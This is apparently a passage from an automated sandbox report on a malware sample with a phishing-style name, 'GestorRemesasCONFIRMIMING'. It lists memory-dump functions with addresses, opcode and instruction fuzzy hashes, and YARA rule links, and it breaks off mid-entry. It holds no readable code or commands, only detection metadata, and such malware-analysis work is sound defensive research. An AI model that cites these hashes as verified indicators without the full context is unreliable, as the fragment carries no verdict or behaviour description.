                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d13b536cc7186e9d9a58c5cb115276d6a6db8f7bf3b88b1bcfc2204c547099db
                                                  • Instruction ID: cc92ed8e80350c8497a05ea2661febe883b419eb559f81c10569991dc6fa6150
                                                  • Opcode Fuzzy Hash: d13b536cc7186e9d9a58c5cb115276d6a6db8f7bf3b88b1bcfc2204c547099db
                                                  • Instruction Fuzzy Hash: 9E712730E002498FDB54DBA9C980AAEBBF6FF88300F248529E505EB755DB74ED46CB50
                                                  Function 06914728 Relevance: .2, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 170307152f8808f3c5c72ce59d546d396a7e62d0955a2aaefeb1a6211625a911
                                                  • Instruction ID: 1fd47d4c8da83ea84a86bdde56bc366168a279869fbf0e9963a238ceb2009af6
                                                  • Opcode Fuzzy Hash: 170307152f8808f3c5c72ce59d546d396a7e62d0955a2aaefeb1a6211625a911
                                                  • Instruction Fuzzy Hash: C5618330F002189FEB54DBA5C8547AEBBF6EB88700F20852AE505EB395DF745D45CB91
                                                  Function 0691FBE0 Relevance: .2, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6a5efc70688cd076250b97a86700e322ef0d703fdcc13ebb89c0433895ddaef
                                                  • Instruction ID: e734d5dbfdb1e8b56c6f52296ffb744db6fa4bf604a3fe7c68cc8ea7c822460a
                                                  • Opcode Fuzzy Hash: b6a5efc70688cd076250b97a86700e322ef0d703fdcc13ebb89c0433895ddaef
                                                  • Instruction Fuzzy Hash: A151DD35E0110DDFDF14ABB8E4546AEBBF6EB88311F30886AE506DB651DB358946CB80
                                                  Function 0691F58F Relevance: .2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a7a19864644422fb37e9c74c682d4208ce727b904f3bacc3aa90c6bef09635b
                                                  • Instruction ID: 25eaf3e60714a049971621db7ca26b05695e7585b93b8fef7341657e273910b7
                                                  • Opcode Fuzzy Hash: 7a7a19864644422fb37e9c74c682d4208ce727b904f3bacc3aa90c6bef09635b
                                                  • Instruction Fuzzy Hash: FD51A570F2011C9BEF6466BCD85476F3A9AD7C9350F30442AE10ADB7D6CE69CC4297A2
                                                  Function 0691F5A0 Relevance: .2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fd155f9874164a822b5462e73282862007bdb97e54828b7ef79613739eb0e3ba
                                                  • Instruction ID: e67bd63b58f16dfa909392185031ab3597512bd8ae5cfc739036936ba55ce48e
                                                  • Opcode Fuzzy Hash: fd155f9874164a822b5462e73282862007bdb97e54828b7ef79613739eb0e3ba
                                                  • Instruction Fuzzy Hash: 8B517074F2011C9BEF6466ACD89472F3A9AD7C9350F30442AE10ADB7D6CE69CC429792
                                                  Function 06918CB1 Relevance: .2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bad0315061dd5346d56aa91c5800cc288c9a4445d5c51fcee447353274937a0
                                                  • Instruction ID: 550fc0eee2456d42885d0ae32d757b1d5411bd9057223b4826aacc882b3080ba
                                                  • Opcode Fuzzy Hash: 1bad0315061dd5346d56aa91c5800cc288c9a4445d5c51fcee447353274937a0
                                                  • Instruction Fuzzy Hash: 4D514230B0114A8FDB64EB74D951BAE73F6BF85600F24856AC806DB749EE30DC41DB91
                                                  Function 06914FD0 Relevance: .1, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3bfcbaeb51699f22625a53ae1ce86fd22e7e353eec842365ff7e9cf1746e50d5
                                                  • Instruction ID: 199558aa524e1551bfe0fd736027ae67f775da7e182f2a723cebb6bbbb6c353e
                                                  • Opcode Fuzzy Hash: 3bfcbaeb51699f22625a53ae1ce86fd22e7e353eec842365ff7e9cf1746e50d5
                                                  • Instruction Fuzzy Hash: 26417271E006099FDF70CFA9D880AAFFBB5FB84314F31492AD25ADB640D631E8458B91
                                                  Function 06914719 Relevance: .1, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d8d27361401d326d988c8bef828957608577e4a3b3f9618dd58aea130a5cab6
                                                  • Instruction ID: b9a0ead3b23bbfa82de87a1e5887df8372a142bff09be15890abd9805a841188
                                                  • Opcode Fuzzy Hash: 9d8d27361401d326d988c8bef828957608577e4a3b3f9618dd58aea130a5cab6
                                                  • Instruction Fuzzy Hash: 1D418070F002589FDB54DBE5C854BAEBBF6EF88700F20852AE205AB395DB709C05CB90
                                                  Function 0691DA25 Relevance: .1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf8c57d16ffad5a94f884432898571b93697182f963ae76bd4451fed3325693d
                                                  • Instruction ID: 750d18e7d970c7d2194cee228cae89e92900841496c30d8b98153334aa4291ed
                                                  • Opcode Fuzzy Hash: bf8c57d16ffad5a94f884432898571b93697182f963ae76bd4451fed3325693d
                                                  • Instruction Fuzzy Hash: 06418F70E0024E9FDF65DFB5C8546AEBBB6EF85340F34492AD406DB640DB74A84ACB81
                                                  Function 06915148 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 69053d40f61e17f2a86c5b9bad2163ae0696613c0a4a19308f5786eb3f2db644
                                                  • Instruction ID: be05ff41b105ddd0a6535c3b72dd5260e4a69416fb9cc0d89aa60573109072ad
                                                  • Opcode Fuzzy Hash: 69053d40f61e17f2a86c5b9bad2163ae0696613c0a4a19308f5786eb3f2db644
                                                  • Instruction Fuzzy Hash: 4441B6B5E0010A8FDF618FA9D480B7EBBB6EB85310F368829D559CFA41C635D842CB91
                                                  Function 069121BD Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: baae445e40141c4867b61f0c4656cfe3ec70d5da07e7fdf08a456871a1791e09
                                                  • Instruction ID: a9661fdfe101a842f59ecd34a339adaa4bef7d40ae77a221582b1359b3ea2b1e
                                                  • Opcode Fuzzy Hash: baae445e40141c4867b61f0c4656cfe3ec70d5da07e7fdf08a456871a1791e09
                                                  • Instruction Fuzzy Hash: 0731DD30B1024A8FDB59AB34855476E3BA7AF89200F604869D402DFB85DF35DE42C791
                                                  Function 069121D0 Relevance: .1, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aee721d04a3a67e3150b628c99eea55d37dd90a5618d8588629d7ee2669bc494
                                                  • Instruction ID: 4c42d47c81440218495559d78cec7129a4b6f638ae6ec051ad32e06bf3315d13
                                                  • Opcode Fuzzy Hash: aee721d04a3a67e3150b628c99eea55d37dd90a5618d8588629d7ee2669bc494
                                                  • Instruction Fuzzy Hash: 0131CB30B102098FDB59AB78C95476E7BA7AFC9640F604829D402DF785EE31DE82CBD1
                                                  Function 06912080 Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3bed6e956f280e70def69f90c64c24f1d2ffab1ec3ad60764775303bdb72a47
                                                  • Instruction ID: d4550c72fc6866747846664f7903dfc303696651e766b77b2766cd0d42ae0e9b
                                                  • Opcode Fuzzy Hash: e3bed6e956f280e70def69f90c64c24f1d2ffab1ec3ad60764775303bdb72a47
                                                  • Instruction Fuzzy Hash: 5A316F34E1020A9FDB19DFA4D85469EB7B6AF89700F208519E906EB750DB71ED81CB90
                                                  Function 06912090 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eeb5bb46187f3e26900af93a5450291c3e5b0dcac2783e7a7267dd50a9ce5468
                                                  • Instruction ID: 05c2ac657575a19f7852345a4f31f94223df62789a84daf69afc2313b482f009
                                                  • Opcode Fuzzy Hash: eeb5bb46187f3e26900af93a5450291c3e5b0dcac2783e7a7267dd50a9ce5468
                                                  • Instruction Fuzzy Hash: 94316030E1020A9FDB19DFA4D85469EB7B6FF89300F208519E906EB740DB71AD81CB90
                                                  Function 06913A60 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e0d67bbe3d31001ea2e42c5ff7bfa1888b6df054fb13f444ab8132beae04722
                                                  • Instruction ID: ac21ae9b22c6e1b14a8b8afff5335c340aaaff0bfd3e00da7e57cce2fa008d34
                                                  • Opcode Fuzzy Hash: 2e0d67bbe3d31001ea2e42c5ff7bfa1888b6df054fb13f444ab8132beae04722
                                                  • Instruction Fuzzy Hash: A721B275F012099FDB50DF79E981AEEBBF5AB48310F248169E905EB341EB30DC408B94
                                                  Function 0691FF09 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aeabca8ffd40d68a1535ae81047f17456d8cee127a448552d0304989a558e07f
                                                  • Instruction ID: 495532fb0f87b3222f082d4396582841d500bd0a485938b9fa7d6096250c2ad6
                                                  • Opcode Fuzzy Hash: aeabca8ffd40d68a1535ae81047f17456d8cee127a448552d0304989a558e07f
                                                  • Instruction Fuzzy Hash: 5511EC307003444FDB59B738646023E7AD3ABCA214729487EE10ACB382CF388C079792
                                                  Function 06913A70 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b86cfe784425152d343658f69cff9bf8209fa032295e8caf4ac79e36505193f
                                                  • Instruction ID: f20dac0dc13fea11eafbafcf3efa20100640e0640e90d0313786f0228b1729a3
                                                  • Opcode Fuzzy Hash: 0b86cfe784425152d343658f69cff9bf8209fa032295e8caf4ac79e36505193f
                                                  • Instruction Fuzzy Hash: 7B219275F012199FDF50DF69E981AAEB7F5EB48310F208165E905EB341EB34DC418B94
                                                  Function 00CED030 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4535305653.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_ced000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9125e25db13609b93c4e7862d1f421bd3ac7982e87f2434b73b114542a25521
                                                  • Instruction ID: d1f3b77033e0a01619e5e04731e3324f5fe906d6c0307748cbb6943cf508922e
                                                  • Opcode Fuzzy Hash: e9125e25db13609b93c4e7862d1f421bd3ac7982e87f2434b73b114542a25521
                                                  • Instruction Fuzzy Hash: DE213475504384EFCB14DF16D9C0B26BBA1FB84314F28C56DD90A0B292C77AD847CA62
                                                  Function 00CED005 Relevance: .1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4535305653.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_ced000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 131645fda8ce4d8769cc48fa9c7012b342836cd133e3c406fafc16978422c12a
                                                  • Instruction ID: 1f1a64422fc4c47943abe369b2d4aea3279f86eae7125ea6c6d73068a90a7123
                                                  • Opcode Fuzzy Hash: 131645fda8ce4d8769cc48fa9c7012b342836cd133e3c406fafc16978422c12a
                                                  • Instruction Fuzzy Hash: 7321487550D3C09FCB03CB24D990715BF71AB46214F2985EBD8898F2A7C23A984ACB62
                                                  Function 06916888 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4828307f687091b65cf4c888002413893c1aadd24286584d1bfc70298cdb296c
                                                  • Instruction ID: 364d5c2736c9ff56d4810e3a970d3a103c656aba1b10bb35903d79705c30ab2e
                                                  • Opcode Fuzzy Hash: 4828307f687091b65cf4c888002413893c1aadd24286584d1bfc70298cdb296c
                                                  • Instruction Fuzzy Hash: 88217F30F1111E9BDF94EB69E95069EB7BAEF85310F208469E405EF784DB71ED418B80
                                                  Function 06919E70 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a33d731ac10c5bd159e2733cbe4ee44e6f353b3e1c9b1244ea7bc1a67c169476
                                                  • Instruction ID: c38512fba365743c4d2ec712717a3a63bb2a0d48150e1007047b4302a6a334f9
                                                  • Opcode Fuzzy Hash: a33d731ac10c5bd159e2733cbe4ee44e6f353b3e1c9b1244ea7bc1a67c169476
                                                  • Instruction Fuzzy Hash: E711C231F0015A4FDB61DA68D4606AA77E5FB8A224F34896AE11ADB782DE21DD028781
                                                  Function 06913B80 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 900714bdad0d1ed349457f82f6224120837e6f72345f4cbda31fd2ef98f258b1
                                                  • Instruction ID: ad91001cbdb6457afb1906d52ddff6f97e2d50287dce29530b28ce14880e86b2
                                                  • Opcode Fuzzy Hash: 900714bdad0d1ed349457f82f6224120837e6f72345f4cbda31fd2ef98f258b1
                                                  • Instruction Fuzzy Hash: 43116131B105298FDF549678D8546AF73FAABC9311B204539D906EB344EE24DC028B91
                                                  Function 06913DB8 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a287d995cabf1c6c905cdf30600aa7203f94ff7c02e5a7e4b5f158de84ea7618
                                                  • Instruction ID: ccc6ace47991206fac2903ff9b3039efb52a7375222c98a1b50259af63821e1c
                                                  • Opcode Fuzzy Hash: a287d995cabf1c6c905cdf30600aa7203f94ff7c02e5a7e4b5f158de84ea7618
                                                  • Instruction Fuzzy Hash: 8E01F535B001594FDB229A7D940472BB7EADBC9710F34882EE24ECB341DD61DD024391
                                                  Function 0691ECF8 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9c3e548e8e797ed15c4ea64671460abc0940e19a464a648f00509c76f7d6bce
                                                  • Instruction ID: 5bff97d0a33b8e4507df021cd6ff7f2da482a8c793a87c1006c79b81a67ba3e2
                                                  • Opcode Fuzzy Hash: d9c3e548e8e797ed15c4ea64671460abc0940e19a464a648f00509c76f7d6bce
                                                  • Instruction Fuzzy Hash: 6701B534B041850FDB769A7C945072A7BEADFC6610B34486EE58ACF341DD14DC028391
                                                  Function 06918589 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4d62992b3da99bfe749ee3fed9576fb4000d1a41160ef8409dd648e497a4981
                                                  • Instruction ID: 0d505b55bb94f01eca5b316a38292ea7e9b8579903dc4e905474bcefd8d7a728
                                                  • Opcode Fuzzy Hash: c4d62992b3da99bfe749ee3fed9576fb4000d1a41160ef8409dd648e497a4981
                                                  • Instruction Fuzzy Hash: 0E110830F1025D4FDF249B28D9507AAB7AAEB85310F2004BED10DDB340DB30DD419B92
                                                  Function 0691383B Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30b854b06f183616ffe5b80bd5ccced7c8477bcd83343e68b5d7fa6049ebe933
                                                  • Instruction ID: e79298f2aee25d5f50bc1ab0eec1b42341498ec945738c51fddbf1614589b474
                                                  • Opcode Fuzzy Hash: 30b854b06f183616ffe5b80bd5ccced7c8477bcd83343e68b5d7fa6049ebe933
                                                  • Instruction Fuzzy Hash: F821C7B5D01259AFCB00DF9AD884ACEFFB4FF49320F108169E518A7240D3746554CBA5
                                                  Function 06913B70 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da5113a6d7d8467fe87cab9348d6ef4c98ea18e26df381cc94a8dc8810de4044
                                                  • Instruction ID: c341f9bbbdde27ce03cee5b6fe6510ac516b3e889e45bacce79fc21ab1e5b872
                                                  • Opcode Fuzzy Hash: da5113a6d7d8467fe87cab9348d6ef4c98ea18e26df381cc94a8dc8810de4044
                                                  • Instruction Fuzzy Hash: C201D432B1116A4BDB549A6CDC606FFB7BAABC8220F24453ED546DB344EE64CC0287E1
                                                  Function 06913840 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27aba0ea38442ff8e27a12a24ae6af7f16baf8d5dd136ed8736f899d4dcc8ef3
                                                  • Instruction ID: 4de7446bbaea9b5a8761c61f28c2e1e66c5d0ee09bb1d290e93d5f1bcea991d0
                                                  • Opcode Fuzzy Hash: 27aba0ea38442ff8e27a12a24ae6af7f16baf8d5dd136ed8736f899d4dcc8ef3
                                                  • Instruction Fuzzy Hash: 2E11D3B5D01259AFCB00DF9AD884ACEFFB4FB48310F20816AE518A7300C374A954CFA5
                                                  Function 06913DC8 Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4bd6e12638bce5da3ee527cb14467d1d175c1d8629b424d139dad1d83d5c7fe
                                                  • Instruction ID: 1bdbdb0d1953d224b5d17448361dfeb83df258f13fb4ab27d8b0e61557d115ea
                                                  • Opcode Fuzzy Hash: c4bd6e12638bce5da3ee527cb14467d1d175c1d8629b424d139dad1d83d5c7fe
                                                  • Instruction Fuzzy Hash: 79018C35B001194BEB659A6E945572BB3EFDBC9B10F34883AE60ECB784DE65DC024391
                                                  Function 0691ED08 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef8ce8b825b33c68a02dd0aedd1f1d5d3b458f4cbcb70fa75f85336e50e8826d
                                                  • Instruction ID: 277829cc7bbe0498826a0e71926f17f2c9c123c2db61e7bf9050279a33c82c5b
                                                  • Opcode Fuzzy Hash: ef8ce8b825b33c68a02dd0aedd1f1d5d3b458f4cbcb70fa75f85336e50e8826d
                                                  • Instruction Fuzzy Hash: E401AF39B000194BEB65A67D9450B2F77DBDBCA720F34883AE60ECB780DE65DC024391
                                                  Function 06919E80 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55cb31d3d745fd3916a876cdec0c9f9fa8b6f558cc2a63b5c6366babe3b07e85
                                                  • Instruction ID: 675faf7c534288e0f3abd2100a30898552469f7d85118a5c1763029b23e16b85
                                                  • Opcode Fuzzy Hash: 55cb31d3d745fd3916a876cdec0c9f9fa8b6f558cc2a63b5c6366babe3b07e85
                                                  • Instruction Fuzzy Hash: 5F01A430B1011A4FDB65E67CD46172A73DAFBCA714F304829F10ACB745DE25ED028381
                                                  Function 0691AE88 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 726f02d79c79a3f3976e67ea1e8622283dbe4a2ef48207a15acc3558b2825684
                                                  • Instruction ID: 86af82e2583ade329330927662a91f5a640c2b343b396f444ab6e61817c38362
                                                  • Opcode Fuzzy Hash: 726f02d79c79a3f3976e67ea1e8622283dbe4a2ef48207a15acc3558b2825684
                                                  • Instruction Fuzzy Hash: 5901C831E1025D8BEF64966CD44479EBBAAE785324F30443AE519EF740D631ED458781
                                                  Function 06917E40 Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
